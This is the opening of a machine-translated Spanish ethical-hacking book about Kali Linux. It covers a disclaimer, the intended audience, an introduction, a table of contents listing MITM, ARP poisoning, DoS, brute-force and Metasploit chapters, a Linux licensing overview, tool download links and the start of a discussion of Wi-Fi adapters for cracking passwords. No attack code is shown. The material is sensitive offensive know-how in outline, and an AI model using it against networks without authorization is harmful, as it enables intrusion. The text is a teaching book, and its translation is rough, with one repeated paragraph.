75% encontró este documento útil (4 votos)
1K vistas154 páginas

Kali Linux.

Este documento presenta una introducción a un libro sobre hacking ético con Kali Linux. Explica que el libro enseña conceptos y metodologías clave de seguridad de red a cualquier persona interesada en convertirse en un hacker ético o probador de penetración. Describe las secciones que cubrirá el libro, incluida la instalación de Kali Linux, el uso de herramientas como nmap y Burp Suite, y ataques como fuerza bruta, MITM y DoS. Advierta al lector que solo debe usar estas herramientas con fines de "som

Cargado por

Anthony4
Derechos de autor
© © All Rights Reserved
Nos tomamos en serio los derechos de los contenidos. Si sospechas que se trata de tu contenido, reclámalo aquí.
Formatos disponibles
Descarga como PDF, TXT o lee en línea desde Scribd
75% encontró este documento útil (4 votos)
1K vistas154 páginas

Kali Linux.

Este documento presenta una introducción a un libro sobre hacking ético con Kali Linux. Explica que el libro enseña conceptos y metodologías clave de seguridad de red a cualquier persona interesada en convertirse en un hacker ético o probador de penetración. Describe las secciones que cubrirá el libro, incluida la instalación de Kali Linux, el uso de herramientas como nmap y Burp Suite, y ataques como fuerza bruta, MITM y DoS. Advierta al lector que solo debe usar estas herramientas con fines de "som

Cargado por

Anthony4
Derechos de autor
© © All Rights Reserved
Nos tomamos en serio los derechos de los contenidos. Si sospechas que se trata de tu contenido, reclámalo aquí.
Formatos disponibles
Descarga como PDF, TXT o lee en línea desde Scribd
Está en la página 1/ 154

Machine Translated by Google

HACKEO ÉTICO

CON

KALI LINUX

APRENDE RÁPIDO CÓMO HACKEAR COMO UN PROFESIONAL

POR

Hugo Hoffmann
Machine Translated by Google

Descargo de responsabilidad

Se debe consultar a los profesionales según sea necesario antes de emprender


cualquiera de las acciones aquí respaldadas. Bajo ninguna circunstancia se tendrá
ninguna responsabilidad legal o culpa en contra del editor por cualquier reparación,
daño o pérdida monetaria debido a la información aquí contenida, ya sea directa
o indirectamente. Esta declaración se considera justa y válida tanto por la American
Bar Association como por el Comité de la Asociación de Editores y es legalmente
vinculante en todo Estados Unidos. No hay escenarios en los que el editor o el
autor original de este trabajo puedan ser considerados responsables de cualquier
dificultad o daño que pueda sufrir el lector o cualquier otra persona después de
realizar la información descrita en este documento. La información en las siguientes
páginas está destinada únicamente a fines informativos y, por lo tanto, debe
considerarse universal. Como corresponde a su naturaleza, se presenta sin
garantías en cuanto a su vigencia o interinidad. Las marcas comerciales que se
mencionan se realizan sin el consentimiento por escrito y de ninguna manera
pueden considerarse un respaldo del titular de la marca comercial.
Machine Translated by Google

Público objetivo

Este libro está diseñado para cualquier persona que desee convertirse en un hacker ético o
un probador de penetración en el campo de la seguridad de la información. Este libro está
escrito en inglés cotidiano y no se necesita ninguna formación técnica. El contenido de este
libro proporcionará una guía práctica sobre cómo puede usar Kali Linux para implementar
varios ataques en redes cableadas e inalámbricas. Si se está preparando para convertirse
en un profesional de TI, como un hacker ético, un analista de seguridad de TI, un ingeniero
de seguridad de TI, un analista de redes, un ingeniero de redes o un probador de penetración,
pero todavía tiene dudas y quiere saber acerca de la seguridad de la red, encontrará este
libro sumamente útil. Aprenderá conceptos y metodologías clave que giran en torno a la
seguridad de la red, así como las tecnologías clave que debe tener en cuenta. Si está
realmente interesado en convertirse en un hacker ético o un probador de penetración, este
libro es para usted.
Suponiendo que se esté preparando para convertirse en un profesional de la seguridad de la
información, este libro sin duda le brindará excelentes detalles que lo beneficiarán a medida que
ingrese a esta industria.
Machine Translated by Google

Introducción

Primero, vamos a empezar con la Introducción a Linux, para que tengas una idea
general de qué se trata este Sistema Operativo. A continuación, veremos las
mismas recomendaciones de software y hardware para hackers éticos y pasaremos
directamente a la instalación de Vitrual Box y Kali Linux. Este libro trata
principalmente sobre las herramientas de Kali Linux y cómo implementarlas; sin
embargo, primero tenemos que analizar la comprensión de las pruebas de
penetración y cómo funciona con el reconocimiento y la huella. Analizaremos todos
y cada uno de los pasos que debe seguir como probador de penetración, que
incluyen la Etapa 1, la Etapa 2 y la Etapa 3. Esto es importante para que comprenda
cómo asumir un trabajo como hacker ético. Por ejemplo, qué tipo de preguntas
debe hacer cuando un cliente lo contrata. Entonces, en esta sección, vamos a
incluir el qué, el cuándo, el cómo, pero también todos los requisitos legales para que pueda cubri
También vamos a ver los estándares de prueba de penetración para que pueda
decidir cuál le conviene más. A continuación, vamos a comenzar de manera más
práctica al comprender Footprinting y el descubrimiento de hosts con escaneo de
puertos. Después de eso, nos vamos a ensuciar al comprender cómo puede
descubrir dispositivos con Hping3, cómo configurar un proxy para Burp Suite y
cómo apuntar a dispositivos con Burp Scanner. A continuación, veremos algunas
pruebas de aplicaciones, como tokens de sesiones aleatorias, Spidering e inyección
SQL con SQLmap. Luego continuamos y comenzamos a analizar los ataques por
cable e inalámbricos utilizando Kali Linux. Vamos a ver Dictionary Attack con
Airodump-ng, ARP Poisoning con EtterCAP e implementar Passive Reconnaissance.
A continuación, analizaremos la captura de tráfico por cable e inalámbrico mediante
Port Mirroring, la implementación de SYN Scan Attack y el uso de Xplico. A
continuación, implementaremos MITM Attack de varias maneras, como usar Ettercap
o SSLscript. Continuando, aprenderá cómo manipular Packet utilizando la
herramienta llamada Scapy y cómo capturar tráfico IPv6 con Parasite6. A
continuación, vamos a implementar ataques DoS de varias maneras, ya sea
mediante un ataque de desautenticación o creando un punto de acceso no
autorizado o un gemelo malvado con una herramienta llamada MKD3. A
continuación, veremos la implementación de un ataque de fuerza bruta con TCP
Hydra, pero luego veremos la implementación de varios ataques al mismo tiempo
bajo demanda, con algunas herramientas muy poderosas y peligrosas como Hail
Mary de Armitage, The Metasploit Framework o SET (Conjunto de herramientas de
ingeniería social). Estas herramientas están disponibles tanto para la piratería de sombrero blanc
Machine Translated by Google

lo mismo en ambos casos. Lo que debe comprender es que puede conducir a una
situación terrible para la persona que utiliza dichas herramientas de piratería de manera
no autorizada, lo que podría causar daños en el sistema o una interrupción del sistema.
Si intenta utilizar cualquiera de estas herramientas en una red cableada o inalámbrica
sin estar autorizado y perturba o daña cualquier sistema, eso se consideraría piratería
ilegal de sombrero negro. Por lo tanto, me gustaría animar a todos los lectores a
implementar cualquier herramienta descrita en este libro SÓLO PARA USO DE SOMBRERO BLANCO
Cualquier cosa legalmente autorizada para ayudar a individuos o empresas a encontrar
vulnerabilidades e identificar riesgos potenciales está bien. Todas las herramientas que
describiré, debe usarlas solo para mejorar la postura de seguridad. Si está ansioso por
aprender sobre piratería y pruebas de penetración, se recomienda crear un laboratorio
doméstico y practicar el uso de estas herramientas en una red aislada sobre la que
tenga control total y que no esté conectada a ningún entorno de producción ni a Internet.
Si usa estas herramientas para fines de sombrero negro y lo atrapan, será completamente
suyo y no tendrá a nadie a quien culpar. Por lo tanto, nuevamente, le recomiendo
encarecidamente que se mantenga detrás de las líneas, y todo lo que haga debe ser
completamente legítimo y totalmente autorizado. Si no está seguro de nada de lo que
está haciendo y no tiene idea del resultado, pregúntele a su gerente o NO LO HAGA.
Este libro tiene fines educativos. Es para aquellos que están interesados en aprender y
saber qué hay detrás de las cortinas y les gustaría convertirse en un hacker ético o un
probador de penetración. Además de las cuestiones legales, antes de utilizar cualquiera
de las herramientas, se recomienda tener los conocimientos básicos de los conceptos
de redes.
Machine Translated by Google

lo mismo en ambos casos. Lo que debe comprender es que puede conducir a una
situación terrible para la persona que utiliza dichas herramientas de piratería de manera
no autorizada, lo que podría causar daños en el sistema o una interrupción del sistema.
Si intenta utilizar cualquiera de estas herramientas en una red cableada o inalámbrica
sin estar autorizado y perturba o daña cualquier sistema, eso se consideraría piratería
ilegal de sombrero negro. Por lo tanto, me gustaría animar a todos los lectores a
implementar cualquier herramienta descrita en este libro SÓLO PARA USO DE SOMBRERO BLANCO
Cualquier cosa legalmente autorizada para ayudar a individuos o empresas a encontrar
vulnerabilidades e identificar riesgos potenciales está bien. Todas las herramientas que
describiré, debe usarlas solo para mejorar la postura de seguridad. Si está ansioso por
aprender sobre piratería y pruebas de penetración, se recomienda crear un laboratorio
doméstico y practicar el uso de estas herramientas en una red aislada sobre la que
tenga control total y que no esté conectada a ningún entorno de producción ni a Internet.
Si usa estas herramientas para fines de sombrero negro y lo atrapan, será completamente
suyo y no tendrá a nadie a quien culpar. Por lo tanto, nuevamente, le recomiendo
encarecidamente que se mantenga detrás de las líneas, y todo lo que haga debe ser
completamente legítimo y totalmente autorizado. Si no está seguro de nada de lo que
está haciendo y no tiene idea del resultado, pregúntele a su gerente o NO LO HAGA.
Este libro tiene fines educativos. Es para aquellos que están interesados en aprender y
saber qué hay detrás de las cortinas y les gustaría convertirse en un hacker ético o un
probador de penetración. Además de las cuestiones legales, antes de utilizar cualquiera
de las herramientas, se recomienda tener los conocimientos básicos de los conceptos
de redes.
Machine Translated by Google

Tabla de contenido
Capítulo 1 Introducción a Linux

Capítulo 2 Recomendaciones de software y hardware

Capítulo 3 Instalación de Virtual Box y Kali Linux

Capítulo 4 Introducción a las pruebas de penetración

Capítulo 5 Pruebas de penetración @ Etapa 1

Capítulo 6 Pruebas de penetración @ Etapa 2

Capítulo 7 Pruebas de penetración @ Etapa 3

Capítulo 8 Estándares de prueba de penetración

Capítulo 9 Introducción a Footprinting

Capítulo 10 Detección de hosts con exploración de puertos

Capítulo 11 Detección de dispositivos con Hping3

Capítulo 12 Configuración del proxy de Burp Suite

Capítulo 13 Configuración de destino para Burp Scanner

Capítulo 14 Fichas de sesiones aleatorias

Capítulo 15 Burp Spider-ing e inyección SQL

Capítulo 16 Inyección SQL con SQLmap

Capítulo 17 Ataque de diccionario con Airodump-ng

Capítulo 18 Envenenamiento por ARP con EtterCAP

Capítulo 19 Captura de tráfico con Port Mirroring

Capítulo 20 Reconocimiento Pasivo con Kali

Capítulo 21 Capturando el ataque de escaneo SYN

Capítulo 22 Captura de tráfico con Xplico

Capítulo 23 Ataque MITM con Ettercap

Capítulo 24 Ataque MITM con SSLstrip

Capítulo 25 Manipulación de paquetes con Scapy

Capítulo 26 Ataque de desautenticación contra Rogue AP

Capítulo 27 Captura de paquetes IPv6 con Parasite6

Capítulo 28 Ataque de desautenticación de Evil Twin con mdk3

Capítulo 29 Ataque DoS con MKD3

Capítulo 30 Ataque de fuerza bruta con TCP Hydra

Capítulo 31 Armitage Ave María

Capítulo 32 El Marco Metasploit

Capítulo 33 Caja de herramientas de ingeniería social

Conclusión

Sobre el Autor

Capítulo 1 Introducción a Linux


Machine Translated by Google

Comprender Linux, el sistema operativo líder de la nube, Internet de las cosas,


DevOps y los mundos de servidores empresariales, es fundamental para una carrera de TI.
Comprender el mundo de las licencias de software abierto no es fácil, pero déjame
darte algunos puntos destacados. Si planea trabajar con software libre como Linux,
debe comprender los conceptos básicos de las reglas que lo rigen.
Veamos primero las licencias. Hay tres métodos principales para otorgar licencias; la
Free Software Foundation fundada en 1985 por Richard Stallman, la Open Source
Initiative más joven y Creative Commons.
En primer lugar, la Free Software Foundation quiere que el software sea libre, no tan
gratuito, sino que permita a los usuarios la libertad de hacer lo que quieran con él.
Piénsalo así.

Puede que tengas que pagar por él, pero una vez que sea tuyo puedes hacer lo que
quieras con él. Richard Stallman y su fundación son los autores originales de la GPL
y la Licencia pública general de GNU, que otorga a los usuarios el derecho de hacer
lo que quieran con su software, incluso modificarlo y venderlo, siempre que no hagan
nada cambios en las condiciones originales de la licencia.
El kernel de Linux es la pieza de software más importante publicada en la GPL. Sin
embargo, la Iniciativa de código abierto, si bien coopera con la fundación de software
libre en la medida de lo posible, cree que debería haber acuerdos de licencia más
flexibles si se quiere que el software de código abierto logre el mayor impacto posible
en el mercado de software más grande.
Código abierto significa que el código de programación original de una pieza de
software está disponible para los usuarios, junto con el programa en sí.
Las licencias que se alinean más estrechamente con los objetivos de OSI pero incluyen varias
versiones de Berkeley Software Distribution, también conocido como BSD, que obligan poco más
que las redistribuciones a mostrar el aviso de derechos de autor y el descargo de responsabilidad
del software original.

Esto facilita que los desarrollos comerciales implementen su software modificado bajo
nuevos modelos de licencia sin tener que preocuparse por romper las medidas
anteriores.
Las designaciones FOSS y FLOSS pueden ayudar a reflejar las alteraciones entre
estas dos visiones. FOSS solo implica que el software se puede adquirir de forma
gratuita, aunque FLOSS se centra en lo que puede hacer con
Machine Translated by Google

el software una vez que lo obtenga.

La licencia Creative Commons autoriza a los creadores de casi cualquier cosa, como software,
películas, música o libros, a seleccionar exactamente los derechos que desean reservar para ellos.

Bajo el sistema Creative Commons, un creador puede elegir manualmente entre cualquier
combinación de los siguientes cinco elementos; atribución, que permite la modificación y
redistribución siempre que se incluya la atribución del creador; compartir por igual, lo que requiere
que las condiciones de la licencia original se incluyan en todas las distribuciones y copias futuras.

A continuación, se denomina "no comercial", que permite solo el uso no comercial; no hay obras
derivadas, lo que permite una mayor redistribución, pero solo copias sin modificar; y el dominio
público, que permite todos los usos posibles.

Cuando se utiliza software publicado bajo Creative Commons, es esencial saber exactamente qué
elementos ha seleccionado el autor. La condición de compartir-igual de creative commons, junto
con la GPL de Stallman, están en términos prácticos, relacionados con el sistema de distribución
de copy left.

Las licencias de copia izquierda permiten el reciclaje completo y la redistribución de un paquete


de software, pero solo cuando los permisos sustanciales originales se incluyen en la distribución
del siguiente nivel.

Esto puede ser valioso para los autores que no quieren que su software evolucione nunca hacia
tipos de licencia cerrados, pero quieren que sus derivados permanezcan gratuitos para siempre.
Las licencias de código abierto sin copia se denominan con frecuencia licencias permisivas.

Las licencias permisivas normalmente no requerirán el cumplimiento de ninguna restricción


principal. Las instancias de tales licencias que a menudo permiten casi cualquier uso del software
de la licencia, siempre que el trabajo original se atribuya en derivados, son las licencias MIT, BSD
y Apache.

Hoy en día, prácticamente Apache y MIT son los más utilizados.


Pero el hecho de que el software de código abierto sea gratuito no significa que no tenga lugar
dentro de las operaciones de las empresas "con fines de lucro".

De hecho, los productos de muchas de las empresas más grandes y rentables se construyen
utilizando software de código abierto. En muchos casos, las empresas lanzarán libremente su
software como código abierto, además de brindar un servicio premium y
Machine Translated by Google

apoyo a los consumidores que pagan.

Por ejemplo, las distribuciones de Ubuntu y CentOS Linux son de ese modelo, porque son compatibles
con Canonical y Red Hat de manera consistente, y ambos están en el negocio de brindar soporte a
clientes empresariales, y estos son negocios muy serios.

Otro ejemplo es Red Hat Linux, que IBM compró por más de $30 mil millones. Vale la pena notar que
la corriente principal de las contribuciones de código de programación al kernel de Linux está siendo
escrita por personal de tiempo completo de grandes empresas de tecnología, incluidas Google y
Microsoft.

Curiosamente, ver la licencia para el usuario del software de código abierto en su dispositivo no
siempre es tan fácil. Las aplicaciones de escritorio con frecuencia harán que su información de licencia
esté disponible a través de las selecciones del menú "ayuda y acerca de", pero en otros casos, la
mejor manera de encontrar información de licencia sobre un producto específico es visitar su sitio web.

El kernel de Linux original fue creado por Linus Torvalds a principios de los 90 y luego donado a la
comunidad. Comunidad significa cualquiera, en cualquier momento y en cualquier lugar, y donado
significa que el código de programación de cualquier componente de Linux estará disponible
gratuitamente para que cualquiera lo descargue, modifique y haga lo que quiera con él, incluso
beneficiarse de sus propias versiones personalizadas si así lo desean. .

Un sistema operativo o sistema operativo de computadora es un conjunto de herramientas de software


diseñadas para interpretar los comandos de un usuario, de modo que puedan traducirse a términos
que la computadora host pueda entender. Casi cualquier sistema operativo se puede instalar y
ejecutar en la mayoría de las arquitecturas de hardware estándar, suponiendo que tenga suficiente
memoria y potencia de procesamiento para admitir las funciones del sistema operativo.

Por lo tanto, puede cargar Linux de forma nativa en cualquier computadora o Mac OS, una pequeña
placa de desarrollo que ejecuta un procesador ARM o como una imagen de contenedor virtualizada
dentro de un entorno Docker.

Casi todos los sistemas operativos de escritorio ofrecen dos formas de acceder a sus herramientas a
través de una interfaz gráfica de usuario, también conocida como GUI, y a través de una interfaz de
línea de comandos o CLI.

Todos los sistemas operativos modernos le permiten ejecutar de manera segura y consistente
herramientas sofisticadas de productividad y entretenimiento a través de la GUI y proporcionan un
entorno adecuado donde puede desarrollar su propio software,
Machine Translated by Google

que era lo único que podían hacer las primeras computadoras personales.

Todos los Linux tienen eso en común, pero lo que hacen diferente es lo que es más
interesante. La diferencia más obvia entre Linux y sus competidores comerciales son las
limitaciones comerciales.

Otros los tienen, y Linux no. Esto significa que puede instalar tantas versiones de Linux en
tantos dispositivos de hardware como desee, y nadie le dirá lo contrario.

Esta libertad cambia la forma en que usará su sistema operativo porque le brinda flexibilidad
para realizar los cambios y las personalizaciones que mejor se adapten a sus requisitos.

No es inusual tomar un disco duro con un sistema de archivos Linux instalado desde una
computadora y colocarlo en otra, y funcionará bien al contrario con Windows o Mac OS.

A menudo tengo hasta media docena de instancias virtuales y físicas de Linux ejecutándose
al mismo tiempo mientras pruebo varios procesos de software y diseño de red, algo que
quizás nunca intentaría si necesitara obtener licencias separadas.

Esto debería tener dos ventajas inmediatas para usted. Primero, puede pasar mucho tiempo
experimentando con varias distribuciones y escritorios de Linux a medida que aumentan sus
habilidades con Linux y, naturalmente, puede iniciar una implementación de prueba antes
de lanzar los nuevos recursos basados en Linux de su empresa para asegurarse de que
funcionan correctamente.

El entorno Linux contiene tres tipos de software; el kernel de Linux, la interfaz de escritorio,
como GNOME o Cinnamon, y las personalizaciones proporcionadas por su distribución
específica, como Ubuntu o Red Hat.

Por lo general, no descargará ni administrará directamente el kernel de Linux.


De eso se encargarán los procesos de instalación y actualización utilizados por la distribución
que elija.

Para mantener la estabilidad, no es inusual que las distribuciones ignoren en gran medida
las nuevas versiones del kernel no críticas durante muchos meses. Las distribuciones, en
particular las más grandes y conocidas, se actualizan comúnmente, mientras que los parches
de seguridad y funciones críticas están disponibles casi al instante.

La mayoría de las distribuciones han gestionado repositorios de software de terceros y


Machine Translated by Google

herramientas de administración de paquetes para manejar las actualizaciones. Si observa el cuadro de


diálogo Software y actualizaciones en los cuadros de Linux, puede elegir cómo desea que se apliquen
las actualizaciones.

Además del sistema operativo, hay miles de paquetes de software gratuitos disponibles que le permiten
realizar cualquier tarea informática factible, de manera más rápida y segura que en otras plataformas.

Ya sea que esté buscando suites de productividad de oficina o servidores web y servicios de seguridad,
todo estará integrado en la estructura del sistema Linux por administradores de paquetes confiables.

Por ejemplo, si desea usar un software de edición como Adobe en Windows o Mac, para que funcionen
de manera efectiva sin ralentizar el sistema, necesitará una CPU rápida, 32 GB de RAM y una RAM de
video dedicada.

Estas plataformas pueden costar miles de dólares y requieren sistemas de enfriamiento para evitar que
se derritan. Sin embargo, si usara Linux, podría ejecutar procesos virtualizados, junto con tareas diarias
regulares en una PC simple, construida con menos de $ 300.

Dado que Linux es de código abierto, muchas personas han creado sus propias versiones del sistema
operativo, conocidas como distribuciones o "distribuciones" para satisfacer necesidades especializadas.
El más famoso de estos es el sistema operativo Android de Google para teléfonos inteligentes, pero hay
cientos de otros, incluidas las distribuciones de implementación empresarial, como Red Had Enterprise,
y su reconstrucción comunitaria gratuita, CentOS, por ejemplo.

Hay una distribución especialmente optimizada para aplicaciones científicas y matemáticas avanzadas
llamada Scientific Linux, Kali Linux para pruebas y administración de seguridad de red, en la que
profundizaremos en breve, pero otras distribuciones creadas para integrarse en dispositivos IoT o
Internet de las cosas como Raspbian para la placa de desarrollo ultra económica Raspberry Pi.

Las distribuciones a menudo se agrupan en familias. Por ejemplo, una distribución específica puede
ganar reputación por su estabilidad, buen diseño, parches rápidos y un ecosistema saludable de
software de terceros.

En lugar de tener que reinventar la rueda, otras comunidades podrían bifurcar versiones derivadas de
esa distribución principal y sus propias personalizaciones, y distribuirlas con un nuevo nombre, pero la
relación padre-hijo original permanece.
Machine Translated by Google

Las actualizaciones y los parches se envían desde el padre ascendente hacia abajo a todos los
secundarios. Esta es una forma eficiente y efectiva de mantener sistemas autónomos.

Las familias de distribución más conocidas son Debian, que mantiene un ecosistema descendente
que incluye Ubuntu para todo uso, por ejemplo.

Mint Kali Linux y Red Hat son los responsables de CentOS; y distribuciones de Fedora centradas en
el consumidor; SUSE, que proporciona OpenSUSE; y Arch Linux, infamemente complejo pero
ultraeficiente, cuyos seguidores posteriores incluyen LinHES para la gestión de entretenimiento en
el hogar y el Manjaro centrado en GUI.

También encontrará imágenes de distribución de Linux para todo tipo de implementaciones


dedicadas. Las distribuciones extremadamente livianas se pueden integrar en dispositivos de
Internet de las cosas, como refrigeradores o bombillas.

Los contenedores de Docker son rápidos y eficientes porque comparten el kernel del sistema
operativo con sus entornos de host de Linux y se pueden construir utilizando una amplia gama de
imágenes basadas en Linux.

La nube, liderada por AWS o Amazon Web Services y Azure, el servicio de computación virtualizado
bajo demanda es simplemente genial, ya que contiene todo lo que sabemos sobre computación.

Linux es multipropósito y gratuito, por lo que es el sistema operativo perfecto para implementaciones
en la nube. Se está utilizando otra versión de Linux para ejecutar una gran mayoría de las
ocurrencias en la nube alojadas en la plataforma de nube Azure de Microsoft.

La importancia del cambio de toda la industria a la nube es la aparición de distribuciones de Linux


especializadas que están diseñadas para brindar la mejor experiencia de nube concebible al ser lo
más pequeñas y rápidas posible.

Estas distribuciones especializadas incluirán con frecuencia funciones listas para usar que le
permitirán aprovechar su entorno de alojamiento en la nube específico.
Estas distribuciones incluyen la AMI de Amazon Linux de AWS, por ejemplo.

AMI significa Amazon Machine Image y las versiones de Ubuntu de soporte a largo plazo
especialmente diseñadas. El soporte a largo plazo o las versiones LTS están diseñadas para ser
igual de estables utilizando software y configuraciones completamente probados.

La confiabilidad de tales configuraciones hace posible que los administradores de distribuciones


continúen brindando actualizaciones de seguridad y características a una versión para
Machine Translated by Google

5 años.

Puede implementar una versión LTS como servidor sin preocuparse de reconstruirlo todo
ese tiempo. Si desea probar las últimas y mejores versiones del software, puede continuar
e instalar la versión provisional más reciente, pero para entornos estables, debe tener un
LTS.

En resumen, el software de código abierto se puede entregar utilizando varios modelos


de licencia. La GPL, la Licencia pública general de GNU, permite cualquier uso,
modificación o redistribución siempre que no se cambien los términos de la licencia
original.

Las licencias Creative Commons permiten condiciones de licencia más restrictivas para
dar más opciones a los creadores de software. Otros modelos de licencia importantes
incluyen Apache, BSD y MIT.

Linux es una plataforma flexible que se puede personalizar para alimentar cualquier
dispositivo informático, tanto; físicos o virtuales. Aprendió acerca de las distribuciones de
Linux que empaquetan el kernel de Linux, junto con escritorios de GUI y software y
configuraciones especializados.

Las familias de distribución que analizamos incluyen Red Hat Enterprise Linux, Debian y
Arch. En conclusión, ahora tiene una comprensión básica sobre las formas en que las
distribuciones parchean y mantienen el software en las máquinas Linux, así como
también cómo hacen que las nuevas versiones estén disponibles con frecuencia, incluidas
las versiones LTS o Long Term Support.

Antes de instalar Linux, quiero decir que la instalación de Linux no es una misión simple.
Hay tantas plataformas en las que puede instalar Linux, tantas distribuciones y
lanzamientos de distribuciones y cada una con su propio programa de instalación, tantas
opciones de configuración y tantas rutas de instalación únicas y diferentes que presentan
un pequeño subconjunto del tema de una manera lógica. camino es un desafío.

Puede instalar Linux en PC y servidores tradicionales. Además del hecho de que el


propio sistema operativo Android se basa en un kernel de Linux, no hay nada que le
impida instalar una distribución más convencional, pero tenga en cuenta que tales
experimentos pueden terminar mal para el dispositivo.

¿Qué pasa con un refrigerador o algo más pequeño como un juguete para niños, que es
probable que se produzca en grandes cantidades, o servidores virtuales que están
diseñados para vivir durante unos segundos, realizar una tarea específica sensible al tiempo y
Machine Translated by Google

luego cerrarse para siempre?

Bueno, los procesos de instalación normales no funcionarán correctamente en esos escenarios,


por lo que a menudo tendrá que pensar fuera de la caja. Muchos dispositivos de Internet de las
cosas utilizan placas de desarrollo diminutas, como la económica Raspberry Pi, para ejecutar
sus operaciones informáticas.

En el caso del Pi, puede crear una imagen del sistema operativo en su propia PC y grabarla en
una tarjeta SD, que luego puede insertar en el dispositivo y arrancarlo. Los servidores virtuales
se pueden aprovisionar mediante scripts que definen el sistema operativo preciso y los detalles
de configuración que busca.

A veces, en respuesta a un desencadenante externo, los scripts activarán automáticamente


los recursos en su entorno de destino y los implementarán según sea necesario para satisfacer
la demanda cambiante.

La variedad y la flexibilidad inherentes al ecosistema de código abierto y Linux hacen posible


ensamblar la combinación correcta de capas de software necesarias para que coincidan con
los recursos de hardware que está utilizando y su carga de trabajo de cómputo.

En el curso de una instalación tradicional de Linux, se enfrentará a opciones con respecto a


algunas de las configuraciones del entorno en las que operará su sistema operativo, cómo se
conectará su computadora a la red, qué tipo de cuenta de usuario creará para el día a día.
administración diaria y qué dispositivos de almacenamiento utilizará para el software y los
datos utilizados por su sistema.

Hablemos de esos uno a la vez. Las distribuciones de Linux le permiten elegir interactuar con
la GUI usando cualquiera de los idiomas, pero deberá especificar qué idioma desea y qué
diseño de teclado está usando.

El idioma que elija determinará lo que verá en los cuadros de diálogo y los menús de
configuración en todo el escritorio. También deberá configurar su ubicación, para que Linux
sepa su zona horaria.

Muchas de sus operaciones de gestión de archivos y red dependerán de la configuración de la


zona horaria, por lo que desea hacerlo bien. Esta configuración se puede actualizar más tarde
mediante la GUI o la CLI.

Si es posible, es mejor que habilite el acceso a Internet antes de que comience la instalación.
De esta manera, su distribución puede descargar las últimas actualizaciones que podrían no
estar incluidas en su archivo de instalación, por lo que tendrá una menos.
Machine Translated by Google

qué hacer cuando inicie sesión en su nueva estación de trabajo.

El programa de instalación de CentOS le preguntará si desea configurar un usuario regular para su


sistema o si está de acuerdo con solo el usuario raíz.

Si bien no está obligado a crear un usuario regular, para fortalecer su postura de seguridad, se
recomienda encarecidamente que evite iniciar sesión como usuario "raíz" para las operaciones
normales.

Como alternativa, es mucho mejor iniciar sesión y hacer su trabajo como un usuario normal que
puede, cuando sea necesario, invocar poderes de administración usando pseudo.

Los procesos de instalación estándar de Ubuntu, por ejemplo, ni siquiera ofrecerán la opción de
usar la raíz. Siempre puede optar por el enfoque predeterminado para dispositivos de
almacenamiento donde, en la mayoría de los casos, todo el sistema de archivos se instalará en una
sola partición, pero es posible que desee explorar otras opciones para casos de uso más
complicados o inusuales.

Muchos administradores de servidores prefieren mantener la jerarquía de directorios "/var" aislada


en una partición separada para garantizar que los datos de registro del sistema no abrumen al resto
del sistema.

Puede usar una unidad de estado sólido o SSD pequeña pero rápida para la mayoría de los
archivos del sistema, mientras que los directorios "inicio" y "var" más grandes se montan en un
disco duro más grande, pero mucho más lento.

Esto le permite aprovechar la velocidad de la SSD para ejecutar binarios de Linux mientras se sale
con la suya con un disco duro magnético menos costoso para sus datos, donde la diferencia de
rendimiento no sería tan notable.

Se le preguntará si desea que sus dispositivos de almacenamiento se administren como "volúmenes


LVM". Pero, ¿qué es un “volumen LVM”?

Bueno, LVM son las siglas de Logical Volume Manager, que es una forma de virtualizar dispositivos
de almacenamiento, para que sean fáciles de manipular más adelante. ¿Pero cómo funciona?

Bueno, imaginemos que tiene tres unidades físicas separadas en su sistema. LVM los convertiría a
todos en un solo grupo de volúmenes, cuya capacidad es igual al espacio agregado total de las tres
unidades.

En cualquier momento, podrá crear tantos volúmenes lógicos de ese grupo de volúmenes como
desee, utilizando cualquier combinación de capacidad individual, hasta
Machine Translated by Google

al volumen total disponible.

Si sus 3 unidades tenían un tamaño de 2 TB, 500 GB y 200 GB por separado, y necesitaba
trabajar con una unidad de datos de al menos 2,3 TB, podría usar LVM para crear 1
volumen lógico de 2,3 TB y un segundo volumen de 400 GB para todo lo demás.

Si sus requisitos cambian en el futuro, puede reducir el tamaño de su unidad de datos y


transferir los datos adicionales al segundo volumen oa un nuevo volumen. Agregar o
intercambiar volúmenes puede ser una operación relativamente simple. LVM puede
brindarle una fantástica flexibilidad de configuración, pero para configuraciones simples
normalmente no es esencial.

Ahora que conoce parte de la teoría, puede continuar y saltar directamente a la instalación
de Kali Linux, pero antes de hacerlo, me gustaría recomendar algunos otros software y
hardware que debería obtener como Pen Tester.
Machine Translated by Google

Capítulo 2 Recomendaciones de software y hardware

Tcpdump
https://www.tcpdump.org/

Microsoft Net Mi https://


www.microsoft.com/en-us/Download/confirmation.aspx?id=4865

LanDetective
https://landdetective.com/download.html

Analizador
de canales https://www.metageek.com/support/downloads/

Ettercap
https://www.ettercap-project.org/downloads.html

NetworkMiner
https://www.netresec.com/?page=NetworkMiner

Violinista
https://www.telerik.com/fiddler

Wireshark
https://www.wireshark.org/download.html

Kali Linux
https://www.kali.org/downloads/

vmWare
https://my.vmware.com/web/vmware/downloads

Caja virtual
https://www.virtualbox.org/wiki/Downloads
Machine Translated by Google

Mucha gente parece confundirse cuando hablamos de adaptadores inalámbricos y tarjetas


inalámbricas. No saben qué son, por qué los necesitamos y cómo seleccionar el correcto porque
hay tantas marcas y tantos modelos.

Lo que entendemos por un adaptador inalámbrico es el dispositivo que conectas a tu computadora


a través de un puerto USB y te permite comunicarte con otros dispositivos de nuestro Wi-Fi, por
lo que puedes usarlo para conectar redes inalámbricas y comunicarte con otras computadoras
que usar wifi.

Podría estar pensando que su computadora portátil ya tiene esto y sí, la mayoría de las
computadoras portátiles y los teléfonos inteligentes ya tienen esto incorporado. Pero hay dos
problemas con eso.

El primer problema es que no puede acceder a los adaptadores inalámbricos integrados con Kali
Linux si está instalado como una máquina virtual, y el segundo problema es que estos adaptadores
inalámbricos integrados no son buenos para penetrar en las redes inalámbricas.

Incluso si instaló Kali Linux como una máquina principal en su computadora portátil y luego tendrá
acceso a su tarjeta inalámbrica incorporada, aún desea poder usar este adaptador inalámbrico
para pruebas de penetración porque no es compatible con el modo de monitor. o inyección de
paquetes.

Desea poder usarlo para descifrar contraseñas de Wi-Fi y hacer todas las cosas increíbles que
podemos hacer en Kali Linux con aircrack-ng y otras herramientas.
Antes de comenzar a hablar sobre las marcas y los modelos que funcionarán con Kali Linux,
quiero hablar sobre un factor más importante que es el conjunto de chips que se usa dentro del
